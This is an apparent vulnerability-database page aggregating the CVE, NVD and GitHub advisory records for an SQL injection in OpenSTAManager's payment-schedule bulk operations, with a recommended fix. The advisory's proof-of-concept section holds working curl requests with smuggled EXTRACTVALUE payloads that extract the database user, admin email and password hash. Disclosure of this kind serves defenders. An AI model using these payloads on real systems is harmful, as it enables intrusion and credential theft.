Vulnerability-Lookup

CVE-2026-24418 (GCVE-0-2026-24418)

Vulnerability from cvelistv5 – Published: 2026-02-06 18:06 – Updated: 2026-02-06 18:48

Title

OpenSTAManager has an SQL Injection vulnerability in the Scadenzario bulk operations module

Summary

OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

https://github.com/devcode-it/openstamanager/secu…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	devcode-it	openstamanager	Affected: <= 2.9.8

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-24418",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-06T18:47:55.649505Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-06T18:48:34.264Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "openstamanager",
          "vendor": "devcode-it",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 2.9.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-06T18:06:47.383Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq"
        }
      ],
      "source": {
        "advisory": "GHSA-4xwv-49c8-fvhq",
        "discovery": "UNKNOWN"
      },
      "title": "OpenSTAManager has an SQL Injection vulnerability in the Scadenzario bulk operations module"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-24418",
    "datePublished": "2026-02-06T18:06:47.383Z",
    "dateReserved": "2026-01-22T18:19:49.175Z",
    "dateUpdated": "2026-02-06T18:48:34.264Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-24418\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-06T19:16:09.120\",\"lastModified\":\"2026-02-06T21:57:22.450\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-24418\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-06T18:47:55.649505Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-06T18:48:24.877Z\"}}], \"cna\": {\"title\": \"OpenSTAManager has an SQL Injection vulnerability in the Scadenzario bulk operations module\", \"source\": {\"advisory\": \"GHSA-4xwv-49c8-fvhq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 2.9.8\"}]}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq\", \"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-06T18:06:47.383Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-24418\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-06T18:48:34.264Z\", \"dateReserved\": \"2026-01-22T18:19:49.175Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-06T18:06:47.383Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-24418

Vulnerability from fkie_nvd - Published: 2026-02-06 19:16 - Updated: 2026-02-06 21:57

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages."
    }
  ],
  "id": "CVE-2026-24418",
  "lastModified": "2026-02-06T21:57:22.450",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-06T19:16:09.120",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-4XWV-49C8-FVHQ

Vulnerability from github – Published: 2026-02-06 18:24 – Updated: 2026-02-06 18:24

Summary

OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module

Details

Summary

Critical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.

Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameter: id_records[] (POST array) Affected Endpoint: /actions.php?id_module=18 (Scadenzario module) Attack Type: Error-Based SQL Injection (IN clause)

Details

OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.

Vulnerability Chain:

Entry Point: /actions.php (Lines 503-506) php $id_records = post('id_records'); $id_records = is_array($id_records) ? $id_records : explode(';', $id_records); $id_records = array_clean($id_records); $id_records = array_unique($id_records); The array_clean() function only removes empty values - it does NOT validate types.
Vulnerable Function: /lib/util.php (Lines 54-60) php function array_clean($array) { if (!empty($array)) { return array_unique(array_values(array_filter($array, fn ($value) => !empty($value)))); } } Impact: The function filters out empty values but accepts any non-empty value, including SQL Injection payloads.
SQL Injection Point: /modules/scadenzario/bulk.php (Line 88) PRIMARY VULNERABILITY php $scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento'); Impact: Array elements from $id_records are directly concatenated using implode() without type validation or prepare(), enabling full SQL Injection.

Root Cause Analysis:

The vulnerability exists because: 1. post('id_records') returns user-controlled array 2. array_clean() only removes empty values, not non-integer values 3. implode(',', $id_records) concatenates array elements directly into SQL 4. No validation ensures array elements are integers 5. Attacker can inject SQL by providing: id_records[]=1&id_records[]=(MALICIOUS SQL)#

Affected Code Path:

POST /actions.php?id_module=18
  ↓
actions.php:503 - $id_records = post('id_records')
  ↓
actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]
  ↓
actions.php:509 - include 'modules/scadenzario/bulk.php'
  ↓
bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]

PoC

Step 1: Login

curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Error-Based SQL Injection)

Test 1: Extract Database User and Version

curl -b cookies.txt \
  -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" \
  "http://localhost:8081/actions.php?id_module=18"

Response (error message visible to attacker):

<code>XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'</code>

Test 2: Extract Admin Credentials

curl -b cookies.txt \
  -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" \
  "http://localhost:8081/actions.php?id_module=18"

Response:

<code>XPATH syntax error: '~admin:admin@osm.local'</code>

Test 3: Extract Password Hash (Part 1 - first 31 chars)

curl -b cookies.txt \
  -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23" \
  "http://localhost:8081/actions.php?id_module=18"

Response:

<code>XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'</code>

Test 4: Extract Password Hash (Part 2 - chars 32-60)

curl -b cookies.txt \
  -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23" \
  "http://localhost:8081/actions.php?id_module=18"

Response:

<code>XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'</code>

Combined Password Hash:

$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK

Impact

**All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.

Recommended Fix:

Primary Fix - Type Validation:

File: /modules/scadenzario/bulk.php

BEFORE (Vulnerable - Line 88):

$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');

AFTER (Fixed):

// Validate that all array elements are integers
$id_records = array_map('intval', $id_records);
$id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs

$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');

Credits

Discovered by Łukasz Rybak

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.9.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24418"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T18:24:10Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nCritical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.\n\n**Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `id_records[]` (POST array)\n**Affected Endpoint:** `/actions.php?id_module=18` (Scadenzario module)\n**Attack Type:** Error-Based SQL Injection (IN clause)\n\n### Details\n\nOpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the `id_records` array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\n\n**Vulnerability Chain:**\n\n1. **Entry Point:** `/actions.php` (Lines 503-506)\n   ```php\n   $id_records = post(\u0027id_records\u0027);\n   $id_records = is_array($id_records) ? $id_records : explode(\u0027;\u0027, $id_records);\n   $id_records = array_clean($id_records);\n   $id_records = array_unique($id_records);\n   ```\n   The `array_clean()` function only removes empty values - it does NOT validate types.\n\n2. **Vulnerable Function:** `/lib/util.php` (Lines 54-60)\n   ```php\n   function array_clean($array)\n   {\n       if (!empty($array)) {\n           return array_unique(array_values(array_filter($array, fn ($value) =\u003e !empty($value))));\n       }\n   }\n   ```\n   **Impact:** The function filters out empty values but accepts any non-empty value, including SQL Injection payloads.\n\n3. **SQL Injection Point:** `/modules/scadenzario/bulk.php` (Line 88) **PRIMARY VULNERABILITY**\n   ```php\n   $scadenze = $database-\u003eFetchArray(\u0027SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (\u0027.implode(\u0027,\u0027, $id_records).\u0027) AND pagato \u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento\u0027);\n   ```\n   **Impact:** Array elements from `$id_records` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL Injection.\n\n**Root Cause Analysis:**\n\nThe vulnerability exists because:\n1. `post(\u0027id_records\u0027)` returns user-controlled array\n2. `array_clean()` only removes empty values, not non-integer values\n3. `implode(\u0027,\u0027, $id_records)` concatenates array elements directly into SQL\n4. No validation ensures array elements are integers\n5. Attacker can inject SQL by providing: `id_records[]=1\u0026id_records[]=(MALICIOUS SQL)#`\n\n**Affected Code Path:**\n```\nPOST /actions.php?id_module=18\n  \u2193\nactions.php:503 - $id_records = post(\u0027id_records\u0027)\n  \u2193\nactions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]\n  \u2193\nactions.php:509 - include \u0027modules/scadenzario/bulk.php\u0027\n  \u2193\nbulk.php:88 - WHERE id IN (\u0027.implode(\u0027,\u0027, $id_records).\u0027) [INJECTION POINT]\n```\n\n### PoC\n\n**Step 1: Login**\n```bash\ncurl -c cookies.txt -X POST \u0027http://localhost:8081/index.php?op=login\u0027 \\\n  -d \u0027username=admin\u0026password=admin\u0027\n```\n\n**Step 2: Verify Vulnerability (Error-Based SQL Injection)**\n\n**Test 1: Extract Database User and Version**\n```bash\ncurl -b cookies.txt \\\n  -d \"op=send_reminder\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),\u0027 | \u0027,VERSION()))))%23\" \\\n  \"http://localhost:8081/actions.php?id_module=18\"\n```\n\n**Response (error message visible to attacker):**\n```html\n\u003ccode\u003eXPATH syntax error: \u0027~osm@localhost | 8.0.40-0ubuntu0.22.04.1\u0027\u003c/code\u003e\n```\n\n**Test 2: Extract Admin Credentials**\n```bash\ncurl -b cookies.txt \\\n  -d \"op=send_reminder\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,\u0027:\u0027,email) FROM zz_users LIMIT 1)))%23\" \\\n  \"http://localhost:8081/actions.php?id_module=18\"\n```\n\n**Response:**\n```html\n\u003ccode\u003eXPATH syntax error: \u0027~admin:admin@osm.local\u0027\u003c/code\u003e\n```\n\n**Test 3: Extract Password Hash (Part 1 - first 31 chars)**\n```bash\ncurl -b cookies.txt \\\n  -d \"op=send_reminder\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23\" \\\n  \"http://localhost:8081/actions.php?id_module=18\"\n```\n\n**Response:**\n```html\n\u003ccode\u003eXPATH syntax error: \u0027~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd\u0027\u003c/code\u003e\n```\n\n**Test 4: Extract Password Hash (Part 2 - chars 32-60)**\n```bash\ncurl -b cookies.txt \\\n  -d \"op=send_reminder\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23\" \\\n  \"http://localhost:8081/actions.php?id_module=18\"\n```\n\n**Response:**\n```html\n\u003ccode\u003eXPATH syntax error: \u0027~SoqiRNefN.G9fYMVnCRcvmG0BnwTK\u0027\u003c/code\u003e\n```\n\n**Combined Password Hash:**\n```\n$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK\n```\n\n\n### Impact\n\n**All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.\n\n**Recommended Fix:**\n\n**Primary Fix - Type Validation:**\n\nFile: `/modules/scadenzario/bulk.php`\n\n**BEFORE (Vulnerable - Line 88):**\n```php\n$scadenze = $database-\u003eFetchArray(\u0027SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (\u0027.implode(\u0027,\u0027, $id_records).\u0027) AND pagato \u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento\u0027);\n```\n\n**AFTER (Fixed):**\n```php\n// Validate that all array elements are integers\n$id_records = array_map(\u0027intval\u0027, $id_records);\n$id_records = array_filter($id_records, fn($id) =\u003e $id \u003e 0); // Remove zero/negative IDs\n\n$scadenze = $database-\u003eFetchArray(\u0027SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (\u0027.implode(\u0027,\u0027, $id_records).\u0027) AND pagato \u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento\u0027);\n```\n\n### Credits\nDiscovered by \u0141ukasz Rybak",
  "id": "GHSA-4xwv-49c8-fvhq",
  "modified": "2026-02-06T18:24:10Z",
  "published": "2026-02-06T18:24:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-24418 (GCVE-0-2026-24418)

FKIE_CVE-2026-24418

GHSA-4XWV-49C8-FVHQ

Summary

Details

PoC

Impact

Credits

Tags

Sightings

Nomenclature